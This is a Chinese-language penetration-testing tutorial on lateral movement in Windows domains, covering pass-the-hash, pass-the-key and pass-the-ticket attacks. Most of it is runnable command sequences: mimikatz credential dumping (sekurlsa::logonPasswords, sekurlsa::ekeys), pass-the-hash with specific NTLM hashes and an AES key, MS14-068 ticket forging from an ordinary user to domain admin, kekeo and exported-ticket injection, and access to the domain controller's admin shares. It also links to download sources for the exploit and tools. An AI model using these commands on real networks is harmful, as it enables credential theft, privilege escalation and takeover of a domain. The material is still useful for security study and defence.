【内网渗透】域横向PTHPTKPTT哈希票据传递
目录
- 0x001 相关知识
- 0x002 域横向移动PTH NTML传递
- 0x003 域横向移动PTK aes256传递
- 0x004 域横向移动PTT哈希票据传递-ms14068&kekeo&本地
- 0x005 开源内网神器Ladon
0x001 相关知识
1)PTH(pass the hash) 利用LM
或NTLM
的值进行的渗透测试
PTH
在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash
和NTLM Hash
访问远程主机或服务,而不用提供明文密码。
如果禁用了NTLM
认证,PsExec
无法利用获得的NTLM hash
进行远程连接,但是使用mimikatz
还是可以攻击成功。对于8.1/2012r2
安装补丁kb2871997
的Win 7/2008r2/8/2012
等,可以使用AES keys
代替NT hash
来实现PTH
攻击
总结:KB2871997
补丁后的影响
- PTH:没打补丁用户都可以连接,打了补丁只能administrator连接
- PTK:打了补丁才能用户都可以连接,采用aes256连接
2)PTK(pass the key) #利用的ekeys aes256进行的渗透测试
攻击方式同PTH,只是打了补丁后将NTML值换成aes256加密的值
3)PTT(pass the ticket) #利用的票据凭证TGT进行的渗透测试
PTT攻击的部分就不是简单的NTLM认证了,它是利用Kerberos协议进行攻击的,这里就介绍三种常见的攻击方法:MS14-068,Golden ticket,SILVER ticket,简单来说就是将连接合法的票据注入到内存中实现连接。
MS14-068基于漏洞,Golden ticket(黄金票据),SILVER ticket(白银票据)
其中Golden ticket(黄金票据),SILVER ticket(白银票据)属于权限维持技术
MS14-068造成的危害是允许域内任何一个普通用户,将自己提升至域管权限。微软给出的补丁是kb3011780
0x002 域横向移动PTH NTML传递
未打补丁下的工作组及域连接:
# mimikatz 命令
privilege::debug // #提升权限
sekurlsa::logonPasswords // #抓取密码sekurlsa::pth /user:administrator /domain:tencent /ntlm:2baaefbdd1ee80755b986ee93a8848b2
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c
sekurlsa::pth /user:boss /domain:tencent /ntlm:ccef208c6485269c20db2cad21734fe7# 上面反弹回来shell 查看域控的d盘信息
dir \\WIN-83V1721VG9V.tencent.com\d$ // 连接使用ip/域名都可以
0x003 域横向移动PTK aes256传递
打KB2871997
补丁后的工作组及域连接:
# mimikatz 命令
privilege::debug // 提升权限
sekurlsa::ekeys // 获取aessekurlsa::pth /user:administrator /domain:tencent /aes256:f305f03562f81f7847f17bcf9477cce414fb47e4271763cf9078cc2566316e0f
0x004 域横向移动PTT哈希票据传递-ms14068&kekeo&本地
MS14-068
powershell执行
能实现普通用户直接获取域控system权限
1.查看当前sid
whoami/user
2.清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
mimikatz # kerberos::purge // 清空当前机器中所有凭证
mimikatz # kerberos::list // 查看当前机器凭证
mimikatz # kerberos::ptc 票据文件 // 将票据注入到内存中
3.利用ms14-068生成TGT数据
ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45
4.票据注入内存
mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit
5.查看凭证列表
klist
6.利用
dir \\192.168.3.21\c$
MS14-068下载:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
利用工具kekeo
1.生成票据
kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c"
2.导入票据
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
3.查看凭证 klist
4.利用net use载入
dir \\192.168.3.21\c$
工具kekeo下载:https://github.com/gentilkiwi/kekeo/releases
利用本地票据(需管理权限)
这种方式是猜测当前电脑连接过域控,并且连接时长没有超过票据的过期时间(10小时)
# mimikatz 命令
privilege::debug // 提升权限sekurlsa::tickets /export // 导出本地所有票据
kerberos::ptt xxxxxxxxxx.xxxx.kirbi // 导入票据
dir \\192.168.3.21\c$ // 利用
0x005 开源内网神器Ladon
Ladon使用:https://github.com/k8gege/Ladon
【内网渗透】域横向PTHPTKPTT哈希票据传递相关推荐
- 内网安全-域横向PTHPTKPTT哈希票据传递
PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试 PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试 PTK(pass the ke ...
- 内网域横向PTHPTKPTT哈希票据传递
内网域横向PTH&PTK&PTT哈希票据传递 文章目录 内网域横向PTH&PTK&PTT哈希票据传递 PTH,PTT,PTK概念: 总结:KB2871997 补丁后的影 ...
- 【内网安全】域横向PTHPTKPTT哈希票据传递
Kerberos协议具体工作方法,在域中,简要介绍一下: • 客户机将明文密码进行NTLM哈希,然后和时间戳一起加密(使用krbtgt密码hash作为密钥),发送给kdc(域控),kdc对用户进行检测 ...
- 内网安全 - 域横向 PTHPTKPTT
域横向 PTH&PTK&PTT 基础知识 域横向移动PTH传递-Mimikatz 域横向移动PTK传递-mimikatz 域横向移动 PTT 传递-MS14068(主要)&ke ...
- 内网安全-域横向smbwmi明文或hash传递
知识点1: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码 Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码 针对以上情况 ...
- 内网渗透-域横向smbwmin明文hash传递
文章目录 Procdump+Mimikatz配合获取明文hash Hashcat破解获取Windows NTML Hash 域横向移动SMB445服务利用 Psexec/PsTool Impacket ...
- 内网渗透-域渗透简单思路
文章目录 1.权限提升 2.渗透姿势 爆hash,爆aes key 爆hash 爆aes key 3.远程登录 注册表修改 连接命令 4.连接操作 PTH攻击(利用明文或hash连接) IPC(明文连 ...
- 内网渗透测试理论学习之第四篇内网渗透域的横向移动
文章目录 一.IPC 二.HashDump 三.PTH 四.PTT 五.PsExec 六.WMI 七.DCOM 八.SPN 九.Exchange 在内网中,从一台主机移动到另外一台主机,可以采取的方式 ...
- p69 内网安全-域横向 CobaltStrikeSPNRDP
数据来源 SPN(Secret Private Network缩写)_百度百科 (baidu.com) 演示案例 域横向移动RDP传递-Mimikatz 域横向移动SPN服务-探针,请求,导出,破解, ...
最新文章
- Binary Gap(二进制空白)
- 联合登陆【支付宝、网易、QQ】
- vue的js文件中获取vue实例
- 大二上期计算机试题答案,2019年对口升学班上期期末计算机网络技术试卷及答案知识讲解.doc...
- ServerBootstrap的启动流程
- python实现http请求并发_Python使用grequests并发发送请求
- 如何在表单中使用Ajax
- Android中获取网络图片的三种方法
- [Swift]LeetCode74. 搜索二维矩阵 | Search a 2D Matrix
- php 验证ajax提交表单提交表单提交,使用AJAX表单提交将表单数据传递给PHP而不刷新页面...
- java编程 停等协议_在应用层模拟实用停等协议
- java oracle 建表语句_oracle得到建表语句
- JZOJ-senior-3502. 【NOIP2013模拟11.4B组】方格游戏
- 445、Java框架99 -【MyBatis - 多对多】 2020.12.23
- UFS-Net: A unified flame and smoke detection method for early detection of fire in video surveillanc
- libnet/libnids库函数介绍
- 适合普通大众、非科班的路线
- 安徽大学计算机保研学校,她手握6所名校offer,19岁从安徽大学保研到北大,网友却说她亏了...
- 武科WUST-CTF2020“Tiki组 ”
- 使用纹理(Textures)
热门文章
- 生物信息学|Extracting Drug-Drug Interactions with Attention CNNs
- 计算机网络拓扑有,计算机网络拓扑
- win10所有浏览器打开一段时间后会自动关闭-未解决
- 重建oracle inventory
- VueI18n国际化vm._watchers[0].constructor未定义的解决办法:修改源代码吧
- Java面试官经验谈:如何甄别候选人真实的能力,候选人如何展示值钱技能
- PDF文件如何导出成图片,PDF如何转换成图片
- 详解区块链,智能合约,去中心化应用
- 教你用VS Code插件实现五彩斑斓的伪代码
- [ZJOI2007]矩阵游戏(二分图匹配、匈牙利算法)